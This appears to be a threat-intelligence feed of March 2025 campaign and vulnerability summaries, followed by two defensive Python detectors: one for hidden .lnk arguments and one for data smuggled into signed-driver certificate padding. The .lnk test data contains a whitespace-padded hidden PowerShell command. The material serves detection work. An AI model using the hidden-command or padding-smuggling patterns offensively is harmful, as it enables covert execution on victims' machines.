A critical path equivalence vulnerability in Apache Tomcat, CVE-2025-24813, allows unauthenticated attackers to execute arbitrary code on vulnerable servers under specific conditions. The vulnerability affects Tomcat versions 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, 9.0.0.M1 to 9.0.98, and certain 8.5.x versions. Exploitation requires specific server configurations and involves sending malicious PUT and GET requests. Six malicious IP addresses have been identified attempting to exploit this vulnerability, targeting systems in the US, Japan, Mexico, South Korea, and Australia. Multiple proof-of-concept exploits have been published, increasing the likelihood of ongoing exploitation attempts. Users are advised to upgrade to patched versions or implement network-level controls to restrict access to the Tomcat server.
Money Laundering 101, and why there is concern
released on 2025-03-28 @ 12:35:02 AM
This newsletter discusses the process of money laundering in the context of cybercrime, particularly ransomware attacks. It explains the three basic steps of money laundering: placement, layering, and integration. The author expresses concern about regulatory changes that might facilitate easier money laundering, emphasizing the importance of targeting money laundering infrastructure to combat cybercrime. The newsletter also highlights recent security issues, including airport outages in Malaysia, satellite security, and a Chrome zero-day vulnerability. Additionally, it provides information on upcoming security events and lists prevalent malware files detected by Talos telemetry.
When Getting Phished Puts You in Mortal Danger
released on 2025-03-28 @ 12:35:01 AM
The article discusses a network of phishing domains targeting Russians searching for anti-Putin organizations. These domains mimic recruitment websites of Ukrainian paramilitary groups and intelligence agencies. The scam aims to collect personal information from potential recruits, likely for Russian intelligence services. Victims who fall for these phishing attempts risk severe legal consequences, including lengthy prison sentences for alleged treason. The phishing sites are promoted through search engine manipulation, appearing at the top of results on platforms like Yandex, DuckDuckGo, and Bing. The campaign's effectiveness is demonstrated by regular reports of arrests in Russia related to alleged attempts to aid Ukrainian forces.
PJobRAT makes a comeback, takes another crack at chat apps
released on 2025-03-27 @ 09:52:44 PM
In the latest campaign, X-Ops researchers found PJobRAT samples disguising themselves as instant messaging apps. In our telemetry, all the victims appeared to be based in Taiwan.
Over 150K websites hit by full-page hijack linking to Chinese gambling sites
released on 2025-03-27 @ 09:50:48 PM
In February, C/Side uncovered a threat actor targeting over 35,000 websites with a malicious full-page hijack injection. C/Side continued to monitor this actor’s activities and has identified new tactics and techniques. The actor has scaled up their operations significantly, as we now estimate that approximately 150,000 websites have been impacted by this campaign.
Inside Kimsuky’s Latest Cyberattack: Analyzing Malicious Scripts and Payloads
released on 2025-03-27 @ 09:47:08 PM
Kimsuky, also known as “Black Banshee,” is a North Korean APT group active since at least 2012 and believed to be state-sponsored. Its cyber espionage targets countries such as South Korea, Japan, and the U.S. Its tactics include phishing, malware infections (RATs, backdoors, wiper malware), supply chain attacks, lateral movement within networks, and data exfiltration.
TURNING AID INTO ATTACK: EXPLOITATION OF PAKISTAN’S YOUTH LAPTOP SCHEME TO TARGET INDIA
released on 2025-03-27 @ 09:43:33 PM
A Pakistan-based APT group, assessed with medium confidence as APT36, created a fake IndiaPost website to target and infect both Windows and Android users.
CVE-2025-29927: Next.js Middleware Authorization Bypass Flaw
released on 2025-03-27 @ 06:47:12 PM
A critical vulnerability, CVE-2025-29927, with a CVSS score of 9.1 was disclosed on March 21, 2025. This flaw allows attackers to bypass authorization checks in Next.js Middleware, potentially granting unauthorized access to protected resources. The vulnerability affects applications using Middleware for user authorization, session data validation, route access control, redirections, and UI visibility management. The issue stems from how the runMiddleware function handles the x-middleware-subrequest header. Attackers can craft malicious headers to bypass middleware controls. Affected versions range from 11.1.4 to 15.2.3. Users are urged to update to patched versions or implement mitigation strategies to block external requests containing the vulnerable header.
Shifting the sands of RansomHub's EDRKillShifter
released on 2025-03-27 @ 11:03:57 AM
ESET researchers analyze the ransomware ecosystem in 2024, focusing on the newly emerged RansomHub gang. They uncover connections between RansomHub affiliates and rival gangs Play, Medusa, and BianLian through the use of EDRKillShifter, a custom EDR killer developed by RansomHub. The researchers leverage the widespread adoption of EDRKillShifter to track affiliate activities across multiple gangs and reconstruct its development timeline. The article also discusses the rise of EDR killers in ransomware attacks and provides insights into their anatomy and defense strategies. Despite disruptions to major ransomware groups, new threats like RansomHub quickly filled the void, highlighting the need for continued vigilance and law enforcement efforts targeting both operators and affiliates.
Snow White — Beware the Bad Apple in the Torrent
released on 2025-03-27 @ 11:03:55 AM
A new malware campaign is targeting users attempting to download the Snow White movie through torrent sites. The attackers exploit a compromised blog to distribute a malicious torrent package disguised as a pirated version of the film. The package contains a fake codec installer that, when executed, deploys sophisticated malware. This malware disables security features, installs the TOR browser, and communicates with a Dark Web C2 server. The campaign revives old social engineering tactics while incorporating modern malware delivery methods and anti-detection techniques. The article provides file hashes and IoCs for detection, emphasizing the ongoing risks associated with pirated content and the importance of updated security measures.
CoffeeLoader: A Brew of Stealthy Techniques
released on 2025-03-27 @ 11:03:53 AM
CoffeeLoader is a sophisticated malware family discovered in September 2024, designed to download and execute second-stage payloads while evading detection. It employs numerous techniques to bypass security solutions, including a GPU-utilizing packer, call stack spoofing, sleep obfuscation, and Windows fibers. The malware uses HTTPS for command-and-control communications with certificate pinning to prevent man-in-the-middle attacks. It supports various commands for injecting and running shellcode, executables, and DLLs. CoffeeLoader shares similarities with SmokeLoader, which has been observed distributing it. The loader implements advanced features beneficial for evading detection by antivirus, EDRs, and malware sandboxes, making it a formidable threat in the crowded market of malware loaders.
You will always remember this as the day you finally caught FamousSparrow
released on 2025-03-26 @ 08:15:33 PM
ESET researchers uncovered new activity by the FamousSparrow APT group, including two undocumented versions of their SparrowDoor backdoor. The group compromised a US financial sector trade group and a Mexican research institute in July 2024. The new SparrowDoor versions show significant improvements in code quality and architecture, implementing command parallelization. FamousSparrow also used the ShadowPad backdoor for the first time. The analysis revealed links between FamousSparrow and other China-aligned threat actors like Earth Estries. The group's continued development of tools during a period of apparent inactivity suggests they remained active but undetected from 2022 to 2024.
Kentico Xperience Staging Service Authentication Bypass Vulnerabilities (CVE-2025-2746 & CVE-2025-2747)
released on 2025-03-26 @ 08:15:33 PM
Two critical security flaws, CVE-2025-2746 and CVE-2025-2747, have been discovered in Kentico Xperience 13, a digital experience platform. These vulnerabilities allow unauthenticated attackers to bypass the Staging Sync Server's authentication, potentially gaining administrative control over the CMS. Both issues have a CVSS score of 9.8, indicating their severity. The vulnerabilities affect Kentico Xperience through version 13.0.178 when the Staging Service is enabled and configured to use username/password authentication. Exploitation can lead to unauthorized administrative access, remote code execution, data breaches, and system disruption. Mitigation steps include patching, disabling or restricting the Staging Service, using certificate-based authentication, and implementing enhanced monitoring and hardening measures.
Malware found on npm infecting local package with reverse shell
released on 2025-03-26 @ 04:55:36 PM
A sophisticated malware campaign targeting npm packages has been discovered, involving two malicious packages: ethers-provider2 and ethers-providerz. These packages act as downloaders, hiding their malicious payload cleverly. Upon installation, they patch the legitimate locally-installed npm package 'ethers' with a new file containing malicious code. This patched file ultimately serves a reverse shell, connecting to the threat actor's server. The malware employs evasive techniques, maintaining persistence even after removal of the original malicious package. This approach demonstrates a high level of sophistication and poses a significant threat to software supply chain security. The campaign also includes other related packages, highlighting the growing scope of risks for both software producers and end-user organizations.
Melting Pot of macOS Malware Adds Go to Crystal, Nim and Rust Variants
released on 2025-03-26 @ 03:23:26 PM
ReaderUpdate, a macOS malware loader platform active since 2020, has evolved to include variants written in Crystal, Nim, Rust, and now Go programming languages. Originally a compiled Python binary, the malware has been largely dormant until late 2024. The loader is capable of executing remote commands, potentially offering Pay-Per-Install or Malware-as-a-Service. It collects system information, creates persistence mechanisms, and communicates with command and control servers. The Go variant, less common than others, uses string obfuscation techniques to hinder analysis. While currently associated with adware delivery, the loader's capabilities pose a potential threat for more malicious payloads in the future.
A Practical Guide to Uncovering Malicious Infrastructure With Hunt.io
released on 2025-03-25 @ 11:57:11 PM
This guide demonstrates how to use Hunt.io to investigate and track malicious infrastructure. Starting with a single suspicious IP address, the process involves analyzing hosting providers, domain information, open ports, HTTP responses, and TLS certificates. The investigation reveals connections to potential cryptocurrency fraud and malware operations. By leveraging Hunt's scan data and SQL queries, a small cluster of related servers is identified, possibly linked to Latrodectus malware. The guide emphasizes the importance of persistence, pattern recognition, and correlating data from multiple intelligence sources to effectively track threat actor operations.
Operation ForumTroll exploits zero-days in Google Chrome
released on 2025-03-25 @ 11:09:05 PM
In March 2025, a sophisticated malware campaign exploited a zero-day vulnerability in Google Chrome to infect targets. The attack, dubbed Operation ForumTroll, used personalized phishing emails with short-lived links to deliver malware. Kaspersky detected the exploit, reported it to Google, and an update was released to fix the vulnerability (CVE-2025-2783). The campaign targeted media outlets, educational institutions, and government organizations in Russia, disguising itself as invitations to the 'Primakov Readings' forum. The attackers' goal appears to be espionage, and the sophistication of the malware suggests a state-sponsored APT group is behind the operation. The exploit chain involved sandbox escape and remote code execution, though only the former was fully analyzed.
CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin
released on 2025-03-25 @ 09:10:09 PM
Trend Research uncovered a campaign by the Russian threat actor Water Gamayun that exploits a zero-day vulnerability in the Microsoft Management Console framework, named MSC EvilTwin (CVE-2025-26633), to execute malicious code.
New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI
released on 2025-03-25 @ 06:56:55 PM
Cybercriminals are exploiting .NET MAUI, a cross-platform development framework, to create Android malware that evades detection. These threats disguise themselves as legitimate apps, targeting users to steal sensitive information. The malware campaigns use techniques such as hiding code in blob files, multi-stage dynamic loading, and encrypted communications to avoid security measures. Two examples are discussed: a fake bank app targeting Indian users and a fake social media app targeting Chinese-speaking users. The latter employs advanced evasion techniques like excessive permissions in the AndroidManifest.xml file and encrypted socket communication. Users are advised to be cautious when downloading apps from unofficial sources and to use up-to-date security software for protection.
GorillaBot: Technical Analysis and Code Similarities with Mirai
released on 2025-03-25 @ 05:38:01 PM
GorillaBot is a newly discovered Mirai-based botnet that has launched over 300,000 attacks across more than 100 countries, targeting various industries including telecommunications, finance, and education. It reuses Mirai's core logic while adding custom encryption and evasion techniques. The malware uses raw TCP sockets and a custom XTEA-like cipher for C2 communication, implements anti-debugging and anti-analysis checks, and authenticates to its C2 server using a SHA-256-based token. Attack commands are encoded, hashed, and processed using a Mirai-style attack_parse function. GorillaBot's sophistication highlights the ongoing evolution of legacy malware and the need for advanced analysis tools to combat such threats.
YouTube Creators Under Siege Again: Clickflix Technique Fuels Malware Attacks
released on 2025-03-25 @ 05:37:59 PM
Cybercriminals are targeting YouTube creators with a sophisticated malware campaign using the Clickflix technique. Attackers impersonate popular brands and offer fake collaboration opportunities to lure victims. The campaign employs spearphishing emails with malicious attachments and links to fake Microsoft webpages. These pages trick users into executing PowerShell scripts that download and run malware, such as Lumma Stealer. The malware steals browser data, cryptocurrency wallet information, and other sensitive data, transmitting it to command and control servers. The attack chain includes stealth and persistence mechanisms to evade detection. This campaign exploits content creators' interest in brand deals and partnerships, representing an evolution of previously observed tactics against YouTube channels.
Weaver Ant, the Web Shell Whisperer: Tracking a China-Nexus Cyber Operation
released on 2025-03-25 @ 01:10:16 PM
Sygnia uncovered a sophisticated China-nexus threat actor, Weaver Ant, targeting a major Asian telecom company. The group employed web shells and tunneling techniques for persistence and lateral movement, maintaining access for over four years. They utilized encrypted China Chopper and custom 'INMemory' web shells, along with a recursive HTTP tunnel tool for internal network access. Weaver Ant demonstrated advanced evasion techniques, including ETW patching, AMSI bypassing, and 'PowerShell without PowerShell' execution. The operation involved extensive reconnaissance, credential harvesting, and data exfiltration. Despite eradication attempts, the group showed remarkable persistence, adapting their tactics to regain access.
SnakeKeylogger: Multistage Info Stealer Malware Analysis & Prevention
released on 2025-03-25 @ 10:46:34 AM
SnakeKeylogger is a highly active credential-stealing malware targeting individuals and businesses. It employs a multi-stage infection chain, starting with malicious spam emails containing .img files. The malware uses sophisticated techniques like process hollowing and obfuscation to evade detection. It targets various applications, including web browsers, email clients, and FTP software, to harvest sensitive data and credentials. The campaign utilizes an Apache server for malware distribution, regularly updating encrypted payloads. SnakeKeylogger's primary objective is to collect Outlook profile credentials, email configurations, and stored authentication details, which can be exploited for business email compromise or sold on underground markets.
New Phishing Campaign Uses Browser-in-the-Browser Attacks to Target Video Gamers/Counter-Strike 2 Players
released on 2025-03-25 @ 09:02:32 AM
A sophisticated phishing campaign targeting Counter-Strike 2 players has been uncovered, employing browser-in-the-browser (BitB) attacks. The campaign aims to steal Steam accounts by creating convincing fake browser pop-ups that mimic legitimate login pages. The threat actors are abusing the identity of the pro eSports team Navi and promoting their scams on platforms like YouTube. The stolen accounts are likely intended for resale on online marketplaces. The majority of the phishing sites are in English, with one Chinese site discovered. This campaign highlights the ongoing evolution of phishing techniques and the importance of vigilance when encountering login pop-ups, especially for desktop users.
VanHelsing: New RaaS in Town
released on 2025-03-23 @ 03:40:51 PM
VanHelsing RaaS, a new ransomware-as-a-service program launched on March 7, 2025, has quickly gained traction in the cybercrime world. With a low $5,000 deposit for affiliates, it offers an 80% cut of ransom payments. The service provides a user-friendly control panel and targets multiple platforms, including Windows, Linux, BSD, ARM, and ESXi systems. Within two weeks of its launch, VanHelsing infected three victims, demanding large ransoms. The ransomware, written in C++, is actively evolving, with two variants discovered just five days apart. It employs various techniques to evade detection, including a 'Silent' mode and selective encryption of files. The rapid growth and sophistication of VanHelsing RaaS highlight the increasing threat of ransomware attacks.
SVC New Stealer on the Horizon
released on 2025-03-21 @ 06:47:00 PM
SvcStealer 2025 is a newly discovered information stealer malware distributed through spear phishing emails. It targets sensitive data including machine information, installed software, user credentials, cryptocurrency wallets, and browser data. The malware creates a unique folder, terminates specific processes, and harvests data from various sources. It compresses the collected information and sends it to a command and control server. The malware can also download additional payloads and implements evasion techniques. It targets multiple browsers, messaging applications, and specific file types. The campaign was observed in late January 2025, with the threat actors potentially selling the stolen data on underground forums and marketplaces.
Real-Time Anti-Phishing: Essential Defense Against Evolving Cyber Threats
released on 2025-03-21 @ 10:33:20 AM
Phishing remains a prevalent cybersecurity threat, causing financial loss, data theft, and malware deployment. Attackers are expanding targets across platforms and using AI to refine techniques, making detection more challenging. Real-time anti-phishing (RTAP) solutions using AI and machine learning are crucial to combat emerging threats. Recent trends show Facebook as a consistent target, with Roblox and various platforms like Telegram, Coinbase, and PayPal also being targeted. FortiGuard Labs offers advanced RTAP services, employing machine learning, URL reputation checks, and content analysis. Employee awareness and education are essential, with tools like FortiPhish and FortiSAT available for training. The evolving nature of phishing attacks necessitates continuous adaptation of cybersecurity measures to stay ahead of cybercriminals.
Clickbait to Catastrophe: How a Fake Meta Email Leads to Password Plunder
released on 2025-03-21 @ 10:33:19 AM
A sophisticated phishing campaign targeting Meta Business accounts has been uncovered by the Cofense Phishing Defense Center. The attack begins with a fake Instagram alert claiming the user's ads are suspended due to policy violations. Victims are directed to a fraudulent page mimicking Meta's business help center, where they're prompted to interact with a fake chat support or follow step-by-step instructions. The ultimate goal is to trick users into adding the attacker's device as a secure login method via Two-Factor Authentication, effectively hijacking the account. The campaign employs convincing email templates, landing pages, and even includes live agent support to add credibility. Users are urged to verify communications and examine URLs carefully before taking action to protect their social media credentials.
Operation FishMedley targeting governments, NGOs, and think tanks
released on 2025-03-21 @ 10:33:19 AM
ESET researchers have uncovered a global espionage operation called Operation FishMedley, conducted by the FishMonger APT group, which is operated by the Chinese contractor I-SOON. The campaign targeted governments, NGOs, and think tanks across Asia, Europe, and the United States during 2022. The attackers used implants like ShadowPad, SodaMaster, and Spyder, which are common or exclusive to China-aligned threat actors. The operation involved sophisticated tactics including lateral movement, credential theft, and custom malware deployment. Seven victims were identified across various countries and sectors. The analysis provides technical details on the malware used, initial access methods, and command and control infrastructure.
The rising threat of social engineering through fake fixes
released on 2025-03-21 @ 10:33:17 AM
ClickFix is an emerging social engineering tactic that manipulates users into executing malicious actions under the guise of troubleshooting or system maintenance. Attackers present fake error messages, CAPTCHA verifications, or system prompts to convince users to take actions that compromise their devices, often by manually copying and pasting malicious commands into the command line. This method bypasses modern security solutions by tricking users into executing commands themselves. Recent campaigns like OBSCURE#BAT and Storm-1865 have targeted various industries and regions. The attack vector has been observed in Field Effect's telemetry, with attempts to deploy AsyncRAT and other malware. Mitigation strategies include restricting command line use, deploying advanced threat detection solutions, enhancing email and web filtering, training users, and maintaining up-to-date security measures.
Albabat Ransomware Group Potentially Expands Targets to Multiple OS, Uses GitHub to Streamline Operations
released on 2025-03-21 @ 10:33:15 AM
The Albabat ransomware group has evolved its malware to target Windows, Linux, and macOS devices, as evidenced by new versions 2.0.0 and 2.5. The group is using GitHub to streamline operations, storing configuration files and essential components. The ransomware ignores specific folders, encrypts certain file extensions, and kills various processes. It collects system information and stores it in a PostgreSQL database. The GitHub repository, created in February 2024, shows active development with increased activity during specific hours. A newer version 2.5 is likely in development, introducing new cryptocurrency wallets. To mitigate the threat, organizations should implement regular backups, network segmentation, system updates, and user training.
Unboxing Anubis: Exploring the Stealthy Tactics of FIN7's Latest Backdoor
released on 2025-03-20 @ 07:04:32 PM
FIN7, a notorious cybercrime group, has developed a new Python-based backdoor called AnubisBackdoor. This sophisticated tool employs multi-stage attacks, encryption, and obfuscation techniques to evade detection. The malware is distributed through phishing campaigns and uses AES encryption with multiple layers of obfuscation. AnubisBackdoor's core functionality includes network communication, system access, and anti-analysis features. It can execute commands, manipulate files, and gather system information. The backdoor maintains persistence through Windows Registry and uses a custom command protocol for C2 communication. This new tool demonstrates FIN7's continued evolution in developing covert communication channels and highlights their advanced capabilities in cybercrime operations.
Shedding light on the ABYSSWORKER driver
released on 2025-03-20 @ 03:17:53 PM
The ABYSSWORKER driver is a malicious tool used in conjunction with MEDUSA ransomware to disable anti-malware systems. It employs a HEARTCRYPT-packed loader and a revoked certificate-signed driver to target and silence EDR vendors. The driver imitates a legitimate CrowdStrike Falcon driver and uses obfuscation techniques to hinder analysis. It provides various functionalities including file manipulation, process and driver termination, and EDR system disabling. The driver's capabilities include removing callbacks, replacing driver functions, killing system threads, and detaching mini-filter devices. It uses unconventional methods like creating IRPs from scratch to perform file operations. The malware's sophisticated approach demonstrates the evolving tactics of cybercriminals in evading detection and disabling security measures.
Fake Cloudflare Verification Results in LummaStealer Trojan Infections
released on 2025-03-20 @ 04:39:37 AM
A malicious campaign targeting Windows users through WordPress websites is deploying the LummaStealer trojan. Attackers use fake Cloudflare verification prompts to trick users into running malicious PowerShell commands. The infection is spread through compromised plugins or injected JavaScript in legitimate files. Victims are directed to execute commands that download and install the LummaStealer malware, which can steal sensitive data like login credentials and cryptocurrency information. The attackers also create hidden admin users in infected WordPress sites for persistence. Multiple variants of this attack have been observed, with some using URL shortening services to obfuscate malicious links. Website owners are advised to keep software updated, use strong passwords, and implement 2FA to mitigate risks.
Virtue or Vice? A First Look at Paragon's Proliferating Spyware Operations
released on 2025-03-19 @ 09:59:31 PM
The report investigates Paragon Solutions, an Israeli spyware company founded in 2019 that sells a product called Graphite. Through infrastructure analysis, the researchers identified potential Paragon deployments in several countries. They also found evidence linking Paragon to the Canadian Ontario Provincial Police. Working with WhatsApp, they discovered and mitigated a Paragon zero-click exploit targeting civil society members. Forensic analysis of Android devices in Italy confirmed Paragon infections. The report also examines a potentially related iPhone spyware case. It highlights Paragon's targeting of individuals involved in migrant rescue operations in the Mediterranean, raising questions about the company's claims of only selling to customers respecting human rights. The findings challenge Paragon's marketing approach and demonstrate the ongoing risks of mercenary spyware abuse, even in democracies.
Dragon RaaS | Pro-Russian Hacktivist Group Aims to Build on "The Five Families" Cybercrime Reputation
released on 2025-03-19 @ 08:40:46 PM
Dragon RaaS is a ransomware group that emerged in July 2024 as an offshoot of Stormous, part of a larger cybercrime syndicate known as 'The Five Families'. The group markets itself as a sophisticated Ransomware-as-a-Service operation but often conducts defacements and opportunistic attacks rather than large-scale ransomware extortion. Dragon RaaS primarily targets organizations in the US, Israel, UK, France, and Germany, exploiting vulnerabilities in web applications, using brute-force attacks, and leveraging stolen credentials. The group operates two ransomware strains: a Windows-focused encryptor based on StormCry and a PHP webshell. Despite claims of creating a unique ransomware variant, analysis reveals that Dragon RaaS's payloads are slightly modified versions of StormCry.
South Korean Organizations Targeted by Cobalt Strike 'Cat' Delivered by a Rust Beacon
released on 2025-03-18 @ 08:59:19 PM
An exposed web server containing tools for an intrusion campaign targeting South Korean organizations was identified. The server hosted a Rust-compiled Windows executable delivering Cobalt Strike Cat, along with SQLMap, Web-SurvivalScan, and dirsearch. The threat actor used these tools to identify and exploit vulnerable web applications, targeting government and commercial entities. The campaign utilized a Rust-compiled loader with a modified version of Cobalt Strike, providing insight into the actor's malware delivery and post-exploitation techniques. Analysis revealed reconnaissance tools, SQL injection exploitation, and malware delivery components, with logs confirming beacon activity from compromised hosts. The attackers used MinGW- and Rust-compiled loaders to deploy Cobalt Strike Cat and Marte shellcode.
Operation AkaiRyū: Europe invited to Expo 2025 and ANEL backdoor revived
released on 2025-03-18 @ 08:59:17 PM
Chinese threat actor MirrorFace expanded its cyberespionage activities beyond Japan, targeting a Central European diplomatic institute in relation to Expo 2025. The group refreshed its tactics, introducing new tools like customized AsyncRAT and reviving the ANEL backdoor previously associated with APT10. MirrorFace employed spearphishing emails with malicious attachments or links to gain initial access. The attackers used legitimate applications to stealthily install malware, including ANEL, HiddenFace, and AsyncRAT. They also abused Visual Studio Code's remote tunnels feature for stealthy access. The campaign showcased complex execution chains and the use of Windows Sandbox to avoid detection. This operation provides evidence that MirrorFace is likely a subgroup under the APT10 umbrella.
Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns
released on 2025-03-18 @ 08:59:12 PM
A Windows .lnk file vulnerability, ZDI-CAN-25373, has been extensively exploited by state-sponsored and cybercriminal groups. The vulnerability allows hidden command execution through crafted shortcut files, exposing organizations to data theft and cyber espionage risks. Nearly 1,000 malicious .lnk files abusing this vulnerability have been identified, with APT groups from North Korea, Iran, Russia, and China involved in the attacks. Targeted sectors include government, finance, telecommunications, military, and energy across North America, Europe, Asia, South America, and Australia. The exploitation leverages hidden command line arguments within .lnk files, complicating detection. Organizations are urged to implement security measures and maintain vigilance against suspicious .lnk files.
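The summary above says detection is complicated because the command line lives in the .lnk rather than in anything visible. The following is an added example, not code from the report, showing how to pull the COMMAND_LINE_ARGUMENTS field out of a Shell Link with a minimal MS-SHLLINK parser and flag arguments that are buried behind whitespace padding (that the hidden arguments are padded with whitespace is an assumption drawn from public write-ups of this bug, not from the summary). The `build_lnk` helper constructs a sample .lnk in memory; it is not a real sample.

```python
"""Extract and inspect command-line arguments from a Windows .lnk file.

Added example; not the reporting vendor's code. Assumes (public reporting on
this bug) that hidden arguments are prefixed with long whitespace runs so the
Properties dialog shows an empty or truncated Target field.
"""
from __future__ import annotations
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData structures appear in this order, each only if its flag is set
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]
PADDING_CHARS = " \t\n\r\x0b\x0c"


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields; the IDList and LinkInfo are skipped."""
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    flags, = struct.unpack_from("<I", data, 20)        # LinkFlags at offset 20
    off = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:
        id_list_size, = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        link_info_size, = struct.unpack_from("<I", data, off)
        off += link_info_size
    fields = {"flags": flags}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, off)   # CountCharacters
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + count * 2].decode("utf-16-le")
            off += count * 2
        else:
            fields[name] = data[off:off + count].decode("latin-1")
            off += count
    return fields


def padding_verdict(fields: dict, threshold: int = 16) -> tuple[bool, int, str]:
    """Return (suspicious, padding_char_count, arguments_without_padding).

    The threshold is an assumption: a few leading spaces are normal, hundreds
    are not, and control whitespace (LF, CR, VT, FF) never belongs there.
    """
    args = fields.get("arguments", "")
    stripped = args.strip(PADDING_CHARS)
    padding = len(args) - len(stripped)
    control_ws = any(c in args for c in "\n\r\x0b\x0c")
    return (padding >= threshold or control_ws), padding, stripped


def build_lnk(arguments: str, padding: str = "") -> bytes:
    """Constructed minimal .lnk carrying only COMMAND_LINE_ARGUMENTS (test data)."""
    clsid = bytes.fromhex("0114020000000000c000000000000046")   # CLSID_ShellLink
    flags = HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, clsid, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)        # ShowCommand=1
    args = padding + arguments
    return header + struct.pack("<H", len(args)) + args.encode("utf-16-le")


if __name__ == "__main__":
    sample = build_lnk("/c powershell -w hidden -c calc", padding=" " * 300)
    print(padding_verdict(parse_lnk(sample)))
```

Run this over every .lnk in a mail attachment or download directory; anything that returns `suspicious=True` deserves a look at the stripped command, which is what would actually run when the shortcut is double-clicked.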
Legacy Driver Exploitation Through Bypassing Certificate Verification
released on 2025-03-18 @ 01:33:06 PM
A new security threat using the Legacy Driver Exploitation technique has been identified, focusing on remote system control via Gh0stRAT malware. The attack distributes malware through phishing and messaging apps, utilizing DLL side-loading for additional payloads. A modified TrueSight.sys driver bypasses Microsoft's driver blocking system, terminating security processes. The key vulnerability lies in TrueSight.sys versions 3.4.0 and below, exploited by the AVKiller tool. The attacker manipulated the WIN_CERTIFICATE structure's padding area to bypass certificate validation. Microsoft responded by updating the Vulnerable Driver Blocklist. This technique is related to the CVE-2013-3900 vulnerability, highlighting the importance of strengthening certificate validation.
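The padding-area trick described above works because the Authenticode signature covers the PKCS#7 blob but not the bytes that sit between its end and the end of the WIN_CERTIFICATE entry. The following is an added example, not code from the report, that parses a PE's security directory, measures the outer DER SEQUENCE of the embedded PKCS#7 blob, and reports anything beyond it that is more than alignment padding. `build_min_pe` constructs a headers-only PE around a fake DER blob so the check can be exercised offline; neither is a real signed driver.

```python
"""Detect data smuggled into the WIN_CERTIFICATE padding area of a PE.

Added example; not the reporting vendor's tooling. The DER blob and PE
produced by build_min_pe are constructed test data, not real signatures.
"""
from __future__ import annotations
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_HEADER = 8   # dwLength(4) + wRevision(2) + wCertificateType(2)
FAKE_DER = b"\x30\x82\x01\x00" + b"\xAA" * 0x100   # SEQUENCE of 256 bytes


def der_total_length(blob: bytes) -> int:
    """Bytes occupied by the outermost DER SEQUENCE (tag + length + content)."""
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("certificate table does not start with a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:                       # short-form length
        return 2 + first
    n = first & 0x7F                       # long form: n length bytes follow
    if n == 0 or n > 4 or len(blob) < 2 + n:
        raise ValueError("bad DER length encoding")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def security_directory(pe: bytes) -> tuple[int, int]:
    """(file offset, size) of IMAGE_DIRECTORY_ENTRY_SECURITY; offset is a raw offset, not an RVA."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                # skip signature and COFF header
    magic, = struct.unpack_from("<H", pe, opt)
    dd_base = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+
    off, size = struct.unpack_from("<II", pe, dd_base + IMAGE_DIRECTORY_ENTRY_SECURITY * 8)
    return off, size


def check_cert_padding(pe: bytes) -> dict:
    """Compare the DER length of the PKCS#7 blob with dwLength of its WIN_CERTIFICATE."""
    off, size = security_directory(pe)
    if size == 0:
        return {"signed": False}
    dw_length, _revision, cert_type = struct.unpack_from("<IHH", pe, off)
    cert = pe[off + WIN_CERT_HEADER: off + dw_length]
    der_len = der_total_length(cert)
    trailing = cert[der_len:]
    # dwLength is rounded up to 8, so up to 7 zero bytes are legitimate padding.
    # More than that, or any non-zero byte, is data the signature does not cover:
    # the condition CVE-2013-3900's strict padding check rejects.
    clean = len(trailing) < 8 and not any(trailing)
    return {"signed": True, "cert_type": cert_type, "der_length": der_len,
            "trailing_bytes": len(trailing), "padding_clean": clean}


def build_min_pe(cert_der: bytes, extra: bytes = b"") -> bytes:
    """Constructed headers-only PE32+ with a certificate table appended (test data)."""
    body = cert_der + extra
    body += b"\0" * ((-len(body)) % 8)                  # 8-byte alignment
    win_cert = struct.pack("<IHH", WIN_CERT_HEADER + len(body), 0x0200, 0x0002) + body
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 112 + 16 * 8, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\0" * 110        # PE32+ fixed part
    dirs = bytearray(16 * 8)
    cert_off = len(dos) + 4 + len(coff) + len(opt) + len(dirs)
    struct.pack_into("<II", dirs, IMAGE_DIRECTORY_ENTRY_SECURITY * 8, cert_off, len(win_cert))
    return dos + b"PE\0\0" + coff + opt + bytes(dirs) + win_cert


if __name__ == "__main__":
    print(check_cert_padding(build_min_pe(FAKE_DER)))
    print(check_cert_padding(build_min_pe(FAKE_DER, b"\0" * 4 + b"SMUGGLED-DATA")))
```

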